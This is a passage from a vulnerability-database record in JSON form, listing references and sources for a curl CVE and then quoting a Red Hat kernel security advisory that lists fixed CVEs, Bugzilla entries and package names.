"url": "https://access.redhat.com/security/cve/cve-2022-32250"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21166"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21125"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1012"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1012"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-31129"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-20107"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0391"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0391"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-34903"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2015-20107"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2526"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30631"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/bev6br4mti3cewk2yu2hqzuw5fas3fey/"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5499-1"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5495-1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6159"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26116"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26116"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25314"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1729"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27776"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1966"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3177"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26137"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-40528"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1729"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1966"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25313"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26137"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27774"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-40528"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6271"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0408"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30632"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30698"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30629"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26716"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27406"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30293"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23772"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35525"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28131"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-38561"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-40674"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-38561"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22662"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44716"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35527"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29526"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0934"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-0256"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30633"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-3709"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1705"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-3709"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42898"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23773"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35525"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30630"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24795"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26719"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1962"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30635"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2509"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3787"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44716"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26709"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0256"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26700"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27405"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25309"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27404"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30699"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35527"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25310"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32148"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1798"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22628"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0934"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-0308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-37434"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3515"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22922"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27782"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27776"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27779"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30115"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35260"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22926"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27781"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22945"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27774"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27775"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32205"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27780"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35252"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42916"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42915"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22923"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6182"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21166"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-34903"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21123"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6560"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21125"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6507"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-31129"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-36067"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32250"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html/release_notes/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-424135"
},
{
"db": "VULMON",
"id": "CVE-2022-32208"
},
{
"db": "PACKETSTORM",
"id": "168158"
},
{
"db": "PACKETSTORM",
"id": "168213"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "168289"
},
{
"db": "PACKETSTORM",
"id": "168503"
},
{
"db": "PACKETSTORM",
"id": "168378"
},
{
"db": "NVD",
"id": "CVE-2022-32208"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-424135",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2022-32208",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168158",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168213",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170741",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170303",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168289",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168503",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168378",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-32208",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-07-07T00:00:00",
"db": "VULHUB",
"id": "VHN-424135",
"ident": null
},
{
"date": "2022-08-25T15:25:12",
"db": "PACKETSTORM",
"id": "168158",
"ident": null
},
{
"date": "2022-09-01T16:30:25",
"db": "PACKETSTORM",
"id": "168213",
"ident": null
},
{
"date": "2023-01-26T15:29:09",
"db": "PACKETSTORM",
"id": "170741",
"ident": null
},
{
"date": "2022-12-19T13:48:31",
"db": "PACKETSTORM",
"id": "170303",
"ident": null
},
{
"date": "2022-09-07T17:09:04",
"db": "PACKETSTORM",
"id": "168289",
"ident": null
},
{
"date": "2022-09-26T15:37:32",
"db": "PACKETSTORM",
"id": "168503",
"ident": null
},
{
"date": "2022-09-14T15:08:07",
"db": "PACKETSTORM",
"id": "168378",
"ident": null
},
{
"date": "2022-07-07T13:15:08.467000",
"db": "NVD",
"id": "CVE-2022-32208",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-01-05T00:00:00",
"db": "VULHUB",
"id": "VHN-424135",
"ident": null
},
{
"date": "2025-05-05T17:18:13.390000",
"db": "NVD",
"id": "CVE-2022-32208",
"ident": null
}
]
},
"title": {
"_id": null,
"data": "Red Hat Security Advisory 2022-6159-01",
"sources": [
{
"db": "PACKETSTORM",
"id": "168158"
}
],
"trust": 0.1
},
"type": {
"_id": null,
"data": "arbitrary, code execution",
"sources": [
{
"db": "PACKETSTORM",
"id": "170303"
}
],
"trust": 0.1
}
}
VAR-202104-1571
Vulnerability from variot - Updated: 2026-04-10 23:03A race condition in Linux kernel SCTP sockets (net/sctp/socket.c) before 5.12-rc8 can lead to kernel privilege escalation from the context of a network service or an unprivileged process. If sctp_destroy_sock is called without sock_net(sk)->sctp.addr_wq_lock then an element is removed from the auto_asconf_splist list without any proper locking. This can be exploited by an attacker with network service privileges to escalate to root or from the context of an unprivileged user directly if a BPF_CGROUP_INET_SOCK_CREATE is attached which denies creation of some SCTP socket. 8) - x86_64
- Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Security Fix(es): * kernel: out-of-bounds reads in pinctrl subsystem. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2021:4356-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:4356 Issue date: 2021-11-09 CVE Names: CVE-2020-0427 CVE-2020-24502 CVE-2020-24503 CVE-2020-24504 CVE-2020-24586 CVE-2020-24587 CVE-2020-24588 CVE-2020-26139 CVE-2020-26140 CVE-2020-26141 CVE-2020-26143 CVE-2020-26144 CVE-2020-26145 CVE-2020-26146 CVE-2020-26147 CVE-2020-27777 CVE-2020-29368 CVE-2020-29660 CVE-2020-36158 CVE-2020-36386 CVE-2021-0129 CVE-2021-3348 CVE-2021-3489 CVE-2021-3564 CVE-2021-3573 CVE-2021-3600 CVE-2021-3635 CVE-2021-3659 CVE-2021-3679 CVE-2021-3732 CVE-2021-20194 CVE-2021-20239 CVE-2021-23133 CVE-2021-28950 CVE-2021-28971 CVE-2021-29155 CVE-2021-29646 CVE-2021-29650 CVE-2021-31440 CVE-2021-31829 CVE-2021-31916 CVE-2021-33200 ==================================================================== 1.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64 Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, x86_64
Security Fix(es): * kernel: out-of-bounds reads in pinctrl subsystem (CVE-2020-0427) * kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24502) * kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24503) * kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24504) * kernel: Fragmentation cache not cleared on reconnection (CVE-2020-24586) * kernel: Reassembling fragments encrypted under different keys (CVE-2020-24587) * kernel: wifi frame payload being parsed incorrectly as an L2 frame (CVE-2020-24588) * kernel: Forwarding EAPOL from unauthenticated wifi client (CVE-2020-26139) * kernel: accepting plaintext data frames in protected networks (CVE-2020-26140) * kernel: not verifying TKIP MIC of fragmented frames (CVE-2020-26141) * kernel: accepting fragmented plaintext frames in protected networks (CVE-2020-26143) * kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header (CVE-2020-26144) * kernel: accepting plaintext broadcast fragments as full frames (CVE-2020-26145) * kernel: powerpc: RTAS calls can be used to compromise kernel integrity (CVE-2020-27777) * kernel: locking inconsistency in tty_io.c and tty_jobctrl.c can lead to a read-after-free (CVE-2020-29660) * kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function via a long SSID value (CVE-2020-36158) * kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() (CVE-2020-36386) * kernel: Improper access control in BlueZ may allow information disclosure vulnerability. (CVE-2021-0129) * kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c (CVE-2021-3348) * kernel: Linux kernel eBPF RINGBUF map oversized allocation (CVE-2021-3489) * kernel: double free in bluetooth subsystem when the HCI device initialization fails (CVE-2021-3564) * kernel: use-after-free in function hci_sock_bound_ioctl() (CVE-2021-3573) * kernel: eBPF 32-bit source register truncation on div/mod (CVE-2021-3600) * kernel: DoS in rb_per_cpu_empty() (CVE-2021-3679) * kernel: Mounting overlayfs inside an unprivileged user namespace can reveal files (CVE-2021-3732) * kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt() (CVE-2021-20194) * kernel: Race condition in sctp_destroy_sock list_del (CVE-2021-23133) * kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode (CVE-2021-28950) * kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c (CVE-2021-28971) * kernel: protection can be bypassed to leak content of kernel memory (CVE-2021-29155) * kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c (CVE-2021-29646) * kernel: lack a full memory barrier may lead to DoS (CVE-2021-29650) * kernel: local escalation of privileges in handling of eBPF programs (CVE-2021-31440) * kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory (CVE-2021-31829) * kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier (CVE-2021-33200) * kernel: reassembling encrypted fragments with non-consecutive packet numbers (CVE-2020-26146) * kernel: reassembling mixed encrypted/plaintext fragments (CVE-2020-26147) * kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check (CVE-2020-29368) * kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50 (CVE-2021-3635) * kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c (CVE-2021-3659) * kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure (CVE-2021-20239) * kernel: out of bounds array access in drivers/md/dm-ioctl.c (CVE-2021-31916)
- Solution:
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.5 Release Notes linked from the References section.
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
1509204 - dlm: Add ability to set SO_MARK on DLM sockets
1793880 - Unreliable RTC synchronization (11-minute mode)
1816493 - [RHEL 8.3] Discard request from mkfs.xfs takes too much time on raid10
1900844 - CVE-2020-27777 kernel: powerpc: RTAS calls can be used to compromise kernel integrity
1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check
1906522 - CVE-2020-29660 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free
1912683 - CVE-2021-20194 kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt()
1913348 - CVE-2020-36158 kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function in drivers/net/wireless/marvell/mwifiex/join.c via a long SSID value
1915825 - Allow falling back to genfscon labeling when the FS doesn't support xattrs and there is a fs_use_xattr rule for it
1919893 - CVE-2020-0427 kernel: out-of-bounds reads in pinctrl subsystem.
1921958 - CVE-2021-3348 kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c
1923636 - CVE-2021-20239 kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure
1930376 - CVE-2020-24504 kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers
1930379 - CVE-2020-24502 kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers
1930381 - CVE-2020-24503 kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers
1933527 - Files on cifs mount can get mixed contents when underlying file is removed but inode number is reused, when mounted with 'serverino' and 'cache=strict '
1939341 - CNB: net: add inline function skb_csum_is_sctp
1941762 - CVE-2021-28950 kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode
1941784 - CVE-2021-28971 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c
1945345 - CVE-2021-29646 kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c
1945388 - CVE-2021-29650 kernel: lack a full memory barrier upon the assignment of a new table value in net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h may lead to DoS
1946965 - CVE-2021-31916 kernel: out of bounds array access in drivers/md/dm-ioctl.c
1948772 - CVE-2021-23133 kernel: Race condition in sctp_destroy_sock list_del
1951595 - CVE-2021-29155 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory
1953847 - [ethtool] The NLM_F_MULTI should be used for NLM_F_DUMP
1954588 - RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps.
1957788 - CVE-2021-31829 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory
1959559 - CVE-2021-3489 kernel: Linux kernel eBPF RINGBUF map oversized allocation
1959642 - CVE-2020-24586 kernel: Fragmentation cache not cleared on reconnection
1959654 - CVE-2020-24587 kernel: Reassembling fragments encrypted under different keys
1959657 - CVE-2020-24588 kernel: wifi frame payload being parsed incorrectly as an L2 frame
1959663 - CVE-2020-26139 kernel: Forwarding EAPOL from unauthenticated wifi client
1960490 - CVE-2020-26140 kernel: accepting plaintext data frames in protected networks
1960492 - CVE-2020-26141 kernel: not verifying TKIP MIC of fragmented frames
1960496 - CVE-2020-26143 kernel: accepting fragmented plaintext frames in protected networks
1960498 - CVE-2020-26144 kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header
1960500 - CVE-2020-26145 kernel: accepting plaintext broadcast fragments as full frames
1960502 - CVE-2020-26146 kernel: reassembling encrypted fragments with non-consecutive packet numbers
1960504 - CVE-2020-26147 kernel: reassembling mixed encrypted/plaintext fragments
1960708 - please add CAP_CHECKPOINT_RESTORE to capability.h
1964028 - CVE-2021-31440 kernel: local escalation of privileges in handling of eBPF programs
1964139 - CVE-2021-3564 kernel: double free in bluetooth subsystem when the HCI device initialization fails
1965038 - CVE-2021-0129 kernel: Improper access control in BlueZ may allow information disclosure vulnerability.
1965360 - kernel: get_timespec64 does not ignore padding in compat syscalls
1965458 - CVE-2021-33200 kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier
1966578 - CVE-2021-3573 kernel: use-after-free in function hci_sock_bound_ioctl()
1969489 - CVE-2020-36386 kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() in net/bluetooth/hci_event.c
1971101 - ceph: potential data corruption in cephfs write_begin codepath
1972278 - libceph: allow addrvecs with a single NONE/blank address
1974627 - [TIPC] kernel BUG at lib/list_debug.c:31!
1975182 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer [rhel-8.5.0]
1975949 - CVE-2021-3659 kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c
1976679 - blk-mq: fix/improve io scheduler batching dispatch
1976699 - [SCTP]WARNING: CPU: 29 PID: 3165 at mm/page_alloc.c:4579 __alloc_pages_slowpath+0xb74/0xd00
1976946 - CVE-2021-3635 kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50
1976969 - XFS: followup to XFS sync to upstream v5.10 (re BZ1937116)
1977162 - [XDP] test program warning: libbpf: elf: skipping unrecognized data section(16) .eh_frame
1977422 - Missing backport of IMA boot aggregate calculation in rhel 8.4 kernel
1977537 - RHEL8.5: Update the kernel workqueue code to v5.12 level
1977850 - geneve virtual devices lack the NETIF_F_FRAGLIST feature
1978369 - dm writecache: sync with upstream 5.14
1979070 - Inaccessible NFS server overloads clients (native_queued_spin_lock_slowpath connotation?)
1979680 - Backport openvswitch tracepoints
1981954 - CVE-2021-3600 kernel: eBPF 32-bit source register truncation on div/mod
1986138 - Lockd invalid cast to nlm_lockowner
1989165 - CVE-2021-3679 kernel: DoS in rb_per_cpu_empty()
1989999 - ceph omnibus backport for RHEL-8.5.0
1991976 - block: fix New warning in nvme_setup_discard
1992700 - blk-mq: fix kernel panic when iterating over flush request
1995249 - CVE-2021-3732 kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files
1996854 - dm crypt: Avoid percpu_counter spinlock contention in crypt_page_alloc()
- Package List:
Red Hat Enterprise Linux BaseOS (v. 8):
Source: kernel-4.18.0-348.el8.src.rpm
aarch64: bpftool-4.18.0-348.el8.aarch64.rpm bpftool-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-4.18.0-348.el8.aarch64.rpm kernel-core-4.18.0-348.el8.aarch64.rpm kernel-cross-headers-4.18.0-348.el8.aarch64.rpm kernel-debug-4.18.0-348.el8.aarch64.rpm kernel-debug-core-4.18.0-348.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debug-devel-4.18.0-348.el8.aarch64.rpm kernel-debug-modules-4.18.0-348.el8.aarch64.rpm kernel-debug-modules-extra-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm kernel-devel-4.18.0-348.el8.aarch64.rpm kernel-headers-4.18.0-348.el8.aarch64.rpm kernel-modules-4.18.0-348.el8.aarch64.rpm kernel-modules-extra-4.18.0-348.el8.aarch64.rpm kernel-tools-4.18.0-348.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-tools-libs-4.18.0-348.el8.aarch64.rpm perf-4.18.0-348.el8.aarch64.rpm perf-debuginfo-4.18.0-348.el8.aarch64.rpm python3-perf-4.18.0-348.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm
noarch: kernel-abi-stablelists-4.18.0-348.el8.noarch.rpm kernel-doc-4.18.0-348.el8.noarch.rpm
